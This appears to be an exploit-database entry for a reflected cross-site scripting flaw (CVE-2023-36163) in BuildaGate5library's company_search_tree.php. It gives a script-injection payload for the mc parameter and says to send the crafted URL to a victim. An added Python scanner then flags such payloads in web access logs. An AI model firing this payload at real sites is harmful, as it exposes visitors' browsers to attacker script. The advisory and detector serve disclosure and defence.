## https://sploitus.com/exploit?id=PACKETSTORM:173366
# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)  
# Date: 06/07/2023  
# Exploit Author: Idan Malihi  
# Vendor Homepage: None  
# Version: 5  
# Tested on: Microsoft Windows 10 Pro  
# CVE : CVE-2023-36163  
  
#PoC:  
An attacker only needs to find the vulnerable parameter (mc=) and inject JS code such as:  
'><script>prompt("XSS");</script><div id="aa  
  
After that, the attacker needs to send the full URL with the JS code to the victim, whose browser then runs the injected script.  
  
#Payload:  
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
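
For defenders, requests matching this PoC can be found in web server access logs. The following is an added example, not part of the original advisory: it decodes the mc parameter of requests to company_search_tree.php (including layered percent-encoding) and flags values containing quote or angle-bracket characters. The log lines, client addresses, the benign value 1042 and /index.php are constructed for illustration, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let a reflected value close an attribute or open a tag.
BREAKOUT = set("'\"<>")
# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo layered percent-encoding, e.g. %2527 -> %27 -> '."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_mc(request_target):
    """Return decoded mc values that contain markup-breaking characters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/company_search_tree.php"):
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("mc", [])
    return [v for v in map(fully_decode, values) if BREAKOUT & set(v)]

def scan(lines):
    """Return (client, decoded_value) for every flagged request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            findings += [(m.group(1), v) for v in suspicious_mc(m.group(2))]
    return findings

# Constructed sample log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2023:10:00:01 +0000] "GET /company_search_tree.php?mc=1042 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [06/Jul/2023:10:02:14 +0000] "GET /company_search_tree.php?mc=aaa%27%3E%3Cscript%3Eprompt(%22XSS%22)%3B%3C/script%3E%3Cdiv%20id%3D%22aaaa HTTP/1.1" 200 5244',
    '198.51.100.24 - - [06/Jul/2023:10:05:40 +0000] "GET /company_search_tree.php?mc=x%2527%253E HTTP/1.1" 200 5130',
    '203.0.113.9 - - [06/Jul/2023:10:06:02 +0000] "GET /index.php?mc=a%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} mc={value!r}")
```

Treating any quote or angle bracket in mc as suspicious assumes the parameter normally carries simple identifiers; widen or narrow BREAKOUT to match the values your deployment actually sees.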